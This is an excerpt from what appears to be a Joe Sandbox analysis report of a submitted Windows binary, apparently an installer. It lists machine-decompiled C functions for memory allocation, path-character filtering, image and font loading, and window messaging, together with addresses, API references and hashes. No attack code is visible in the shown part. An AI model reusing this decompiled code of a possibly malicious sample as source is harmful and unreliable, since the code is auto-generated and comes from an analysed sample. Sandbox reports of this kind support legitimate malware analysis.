						_t11 = _t88 + 4; // 0x4
						E73C212FA(_t11,  *0x73c25038, _v0);
						 *_t88 =  *0x73c25010;
						 *0x73c25010 = _t88;
						L10:
						_t92 = _t92 + 0xc;
						goto L11;
					}
					if(_t94 == 0) {
						_t74 =  *0x73c2503c;
						_t85 =  *_t74;
						 *_t74 =  *_t85;
						_t75 = _v0;
						_t52 =  *((intOrPtr*)(_t75 + 0xc));
						_a12 = _t52;
						if( *((char*)(_t85 + 4)) == 0x1e) {
							E73C212FA(_t75, _t85 + 6, 0x38);
							_t75 = _v0;
							_t92 = _t92 + 0xc;
							_t52 = _a12;
						}
						 *((intOrPtr*)(_t75 + 0xc)) = _t52;
						GlobalFree(_t85);
						goto L11;
					}
					_t56 = _t29 - 0x46;
					if(_t56 == 0) {
						_t89 = GlobalAlloc(0x40,  *0x73c25040 + 8);
						 *((intOrPtr*)(_t89 + 4)) = 0x1e;
						_t14 = _t89 + 6; // 0x6
						E73C212FA(_t14, _v0, 0x38);
						 *_t89 =  *( *0x73c2503c);
						 *( *0x73c2503c) = _t89;
						goto L10;
					}
					_t62 = _t56 - 6;
					if(_t62 == 0) {
						goto L24;
					}
					_t63 = _t62 - 4;
					if(_t63 == 0) {
						 *_t80 =  *_t80 + 0xa;
						goto L15;
					}
					_t43 = _t63;
					if(_t43 == 0) {
						 *_t80 =  *_t80 + 0xa;
						goto L13;
					}
					goto L8;
					L26:
					_t66 =  *_t80;
				} while (_t66 != 0);
				_t90 = _a8;
				goto L28;
			}


























                                                            0x73c210cc
                                                            0x73c210d6
                                                            0x73c210e0
                                                            0x73c210f4
                                                            0x73c210f7
                                                            0x73c210fe
                                                            0x73c2110d
                                                            0x73c2110f
                                                            0x73c21113
                                                            0x73c21115
                                                            0x73c2111a
                                                            0x73c212a7
                                                            0x73c212ae
                                                            0x73c212ae
                                                            0x73c21124
                                                            0x73c21124
                                                            0x73c21127
                                                            0x73c21128
                                                            0x73c2112b
                                                            0x73c21250
                                                            0x73c21253
                                                            0x73c2126d
                                                            0x73c2126d
                                                            0x73c21274
                                                            0x73c21281
                                                            0x73c21286
                                                            0x73c2128c
                                                            0x73c21292
                                                            0x73c21297
                                                            0x73c21297
                                                            0x00000000
                                                            0x73c21274
                                                            0x73c21255
                                                            0x73c21258
                                                            0x73c211b8
                                                            0x73c211cd
                                                            0x73c211cf
                                                            0x00000000
                                                            0x73c211cf
                                                            0x73c2125f
                                                            0x73c21262
                                                            0x73c2119b
                                                            0x73c211b0
                                                            0x73c211b2
                                                            0x73c2118f
                                                            0x73c2118f
                                                            0x00000000
                                                            0x73c2118f
                                                            0x73c21154
                                                            0x73c21157
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2116d
                                                            0x73c21175
                                                            0x73c21179
                                                            0x73c21184
                                                            0x73c21186
                                                            0x73c2118c
                                                            0x73c2118c
                                                            0x00000000
                                                            0x73c2118c
                                                            0x73c21131
                                                            0x73c21213
                                                            0x73c21219
                                                            0x73c2121d
                                                            0x73c21223
                                                            0x73c21226
                                                            0x73c21229
                                                            0x73c2122d
                                                            0x73c21236
                                                            0x73c2123b
                                                            0x73c2123e
                                                            0x73c21241
                                                            0x73c21241
                                                            0x73c21246
                                                            0x73c21249
                                                            0x00000000
                                                            0x73c21249
                                                            0x73c21137
                                                            0x73c2113a
                                                            0x73c211e6
                                                            0x73c211ea
                                                            0x73c211f1
                                                            0x73c211f8
                                                            0x73c21205
                                                            0x73c2120c
                                                            0x00000000
                                                            0x73c2120c
                                                            0x73c21140
                                                            0x73c21143
                                                            0x00000000
                                                            0x00000000
                                                            0x73c21149
                                                            0x73c2114c
                                                            0x73c211b5
                                                            0x00000000
                                                            0x73c211b5
                                                            0x73c2114f
                                                            0x73c21152
                                                            0x73c21198
                                                            0x00000000
                                                            0x73c21198
                                                            0x00000000
                                                            0x73c21299
                                                            0x73c21299
                                                            0x73c2129b
                                                            0x73c212a3
                                                            0x00000000

                                                            APIs
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 73C21163
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C211B0
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C211CD
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 73C211E0
                                                            • GlobalFree.KERNEL32 ref: 73C21249
                                                            • GlobalFree.KERNEL32(?), ref: 73C21297
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C212A8
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1326511845.0000000073C21000.00000020.00000001.01000000.00000007.sdmp, Offset: 73C20000, based on PE: true
                                                            • Associated: 00000009.00000002.1326498896.0000000073C20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.1326522491.0000000073C24000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.1326541140.0000000073C26000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_73c20000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$Alloc
                                                            • String ID:
                                                            • API String ID: 1780285237-0
                                                            • Opcode ID: e09b2e90db83a55cc885c5158508de348d94e4909bb470ef6077072935ca981c
                                                            • Instruction ID: 2b81290e808fdc0253d494635d262b8392506edb6100a1e7eb1e855cda479bef
                                                            • Opcode Fuzzy Hash: e09b2e90db83a55cc885c5158508de348d94e4909bb470ef6077072935ca981c
                                                            • Instruction Fuzzy Hash: 1E51ADB2414381AFD301DF69CC90B6ABFF8FB19206F254469F98ADB291D732E900CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406535 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00406535(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405C56(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405C14("*?|<>/\":", _t5))) == 0) {
							E00405DA5(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                            0x00406537
                                                            0x0040653f
                                                            0x00406553
                                                            0x00406553
                                                            0x00406559
                                                            0x00406566
                                                            0x00406566
                                                            0x00406567
                                                            0x00406569
                                                            0x0040656d
                                                            0x0040656f
                                                            0x00406578
                                                            0x0040657a
                                                            0x00406594
                                                            0x0040659c
                                                            0x0040659c
                                                            0x004065a1
                                                            0x004065a3
                                                            0x004065a5
                                                            0x004065a9
                                                            0x004065aa
                                                            0x004065ad
                                                            0x004065b5
                                                            0x004065b7
                                                            0x004065bb
                                                            0x00000000
                                                            0x00000000
                                                            0x004065c1
                                                            0x004065c6
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004065c6
                                                            0x004065cb

                                                            APIs
                                                            • CharNextA.USER32(0000000B), ref: 0040658D
                                                            • CharNextA.USER32(0000000B), ref: 0040659A
                                                            • CharNextA.USER32(0000000B), ref: 0040659F
                                                            • CharPrevA.USER32(0000000B,0000000B), ref: 004065AF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Char$Next$Prev
                                                            • String ID: *?|<>/":
                                                            • API String ID: 589700163-165019052
                                                            • Opcode ID: 28daa348592e837642e08a63fb50167dd7553375ed6c1e47afa6a3256008987e
                                                            • Instruction ID: f1a46c244338e9c327de57877a99ef2f1f2ce6c7380876dc27bda46ebf0462ee
                                                            • Opcode Fuzzy Hash: 28daa348592e837642e08a63fb50167dd7553375ed6c1e47afa6a3256008987e
                                                            • Instruction Fuzzy Hash: 671134918047903DFB3216386C04B776FC94F9B760F5A007BE4C2722CAC63C5CA6826D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401D65 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 77%
                                                            			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402C17(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402C39(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x452420,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E004061B5();
				}
				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                            0x00401d65
                                                            0x00401d69
                                                            0x00401d7e
                                                            0x00401d6b
                                                            0x00401d6d
                                                            0x00401d73
                                                            0x00401d73
                                                            0x00401d84
                                                            0x00401d87
                                                            0x00401d91
                                                            0x00401d94
                                                            0x00401d9c
                                                            0x00401dad
                                                            0x00401db0
                                                            0x00401dbb
                                                            0x00401db2
                                                            0x00401db4
                                                            0x00401db4
                                                            0x00401dbf
                                                            0x00401dcc
                                                            0x00401df3
                                                            0x00401e02
                                                            0x00401e10
                                                            0x00401e18
                                                            0x00401e20
                                                            0x00401e20
                                                            0x00401e29
                                                            0x00401e2f
                                                            0x00402a42
                                                            0x00402a42
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                            • String ID:
                                                            • API String ID: 1849352358-0
                                                            • Opcode ID: a576bf6efa7c2fb23105444ffa85423c352b0735285158bf1a86dfd814425e5e
                                                            • Instruction ID: e108dfa7ff8bed4c569463ce295f5c853ec5e47b290a4dfb9769ed3a77c2d4ca
                                                            • Opcode Fuzzy Hash: a576bf6efa7c2fb23105444ffa85423c352b0735285158bf1a86dfd814425e5e
                                                            • Instruction Fuzzy Hash: 63213B72E00109AFDF15DFA4DD85AAEBBB5EB48300F24407EF901F62A1DB789941DB14
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401E35 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 73%
                                                            			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402C17(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x414438->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x414448 = E00402C17(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x41444f = 1;
				 *0x41444c = _t15 & 0x00000001;
				 *0x41444d = _t15 & 0x00000002;
				 *0x41444e = _t15 & 0x00000004;
				E004062EA(_t9, _t31, _t33, 0x414454,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x414438);
				_push(_t18);
				_push(_t33);
				E004061B5();
				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                            0x00401e35
                                                            0x00401e40
                                                            0x00401e42
                                                            0x00401e4f
                                                            0x00401e66
                                                            0x00401e6b
                                                            0x00401e78
                                                            0x00401e7d
                                                            0x00401e81
                                                            0x00401e8c
                                                            0x00401e93
                                                            0x00401ea5
                                                            0x00401eab
                                                            0x00401eb0
                                                            0x00401eba
                                                            0x00402628
                                                            0x00401569
                                                            0x00402a42
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                            • GetDC.USER32(?), ref: 00401E38
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                            • MulDiv.KERNEL32 ref: 00401E5A
                                                            • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                            • CreateFontIndirectA.GDI32(00414438), ref: 00401EBA
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                            • String ID:
                                                            • API String ID: 3808545654-0
                                                            • Opcode ID: e89e6eedd1c15f4ce250c8d11fd485d8fe03999d8a0dbcf2c806e51525b441ac
                                                            • Instruction ID: 8ddd809678b75effdda657bd79c7971a8a008a3e86d82937076eaa48eaf57caa
                                                            • Opcode Fuzzy Hash: e89e6eedd1c15f4ce250c8d11fd485d8fe03999d8a0dbcf2c806e51525b441ac
                                                            • Instruction Fuzzy Hash: 8D01B571504240AFE7006BB0EE4ABDD7FF49B95319F14447DF281B71E2CA7804898B2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404B1D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 77%
                                                            			E00404B1D(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E004062EA(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E004062EA(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E004062EA(_t41, _t47, 0x43c090, 0x43c090, _a8);
				wsprintfA(_t32 + lstrlenA(0x43c090), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x44e3f8, _a4, 0x43c090);
			}



















                                                            0x00404b23
                                                            0x00404b28
                                                            0x00404b30
                                                            0x00404b31
                                                            0x00404b3e
                                                            0x00404b46
                                                            0x00404b47
                                                            0x00404b49
                                                            0x00404b4b
                                                            0x00404b4d
                                                            0x00404b50
                                                            0x00404b50
                                                            0x00404b57
                                                            0x00404b5d
                                                            0x00404b5d
                                                            0x00404b64
                                                            0x00404b6b
                                                            0x00404b6e
                                                            0x00404b71
                                                            0x00404b71
                                                            0x00404b75
                                                            0x00404b85
                                                            0x00404b87
                                                            0x00404b8a
                                                            0x00404b33
                                                            0x00404b33
                                                            0x00404b3a
                                                            0x00404b3a
                                                            0x00404b92
                                                            0x00404b9d
                                                            0x00404bb3
                                                            0x00404bc3
                                                            0x00404bdf

                                                            APIs
                                                            • lstrlenA.KERNEL32(0043C090,0043C090,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A38,000000DF,00000000,00000400,?), ref: 00404BBB
                                                            • wsprintfA.USER32 ref: 00404BC3
                                                            • SetDlgItemTextA.USER32(?,0043C090), ref: 00404BD6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ItemTextlstrlenwsprintf
                                                            • String ID: %u.%u%s%s
                                                            • API String ID: 3540041739-3551169577
                                                            • Opcode ID: ef18dc2ada111650a354b4d1e8e6ccd4a0c7f7449d403410ef4590da8fa39622
                                                            • Instruction ID: 7c3cbaaa6cddaf4418f9485f50c6cec2219b2b57f28ad8e3923d4dc00c9a2874
                                                            • Opcode Fuzzy Hash: ef18dc2ada111650a354b4d1e8e6ccd4a0c7f7449d403410ef4590da8fa39622
                                                            • Instruction Fuzzy Hash: 7811E773A0412867DB00766D9C41FAF3298DB85374F25027BFA26F31D1E978DC1282A8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 59%
                                                            			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402C17(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402C17(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402C39(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402C39(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402C39();
					_t32 = E00402C39();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402C17();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402C17(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E004061B5();
				}
				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                            0x00401c2e
                                                            0x00401c30
                                                            0x00401c37
                                                            0x00401c3a
                                                            0x00401c3d
                                                            0x00401c47
                                                            0x00401c4b
                                                            0x00401c4e
                                                            0x00401c57
                                                            0x00401c57
                                                            0x00401c5a
                                                            0x00401c5e
                                                            0x00401c67
                                                            0x00401c67
                                                            0x00401c6a
                                                            0x00401c6e
                                                            0x00401c70
                                                            0x00401cc5
                                                            0x00401cc7
                                                            0x00401cd0
                                                            0x00401cd8
                                                            0x00401cdb
                                                            0x00401cdb
                                                            0x00401ce4
                                                            0x00000000
                                                            0x00401c72
                                                            0x00401c79
                                                            0x00401c7b
                                                            0x00401c7e
                                                            0x00401c84
                                                            0x00401c8b
                                                            0x00401c8e
                                                            0x00401cb6
                                                            0x00401cea
                                                            0x00401cea
                                                            0x00401c90
                                                            0x00401c9e
                                                            0x00401ca6
                                                            0x00401ca9
                                                            0x00401ca9
                                                            0x00401c8e
                                                            0x00401ced
                                                            0x00401cf0
                                                            0x00401cf6
                                                            0x00402a42
                                                            0x00402a42
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                            • SendMessageA.USER32 ref: 00401CB6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
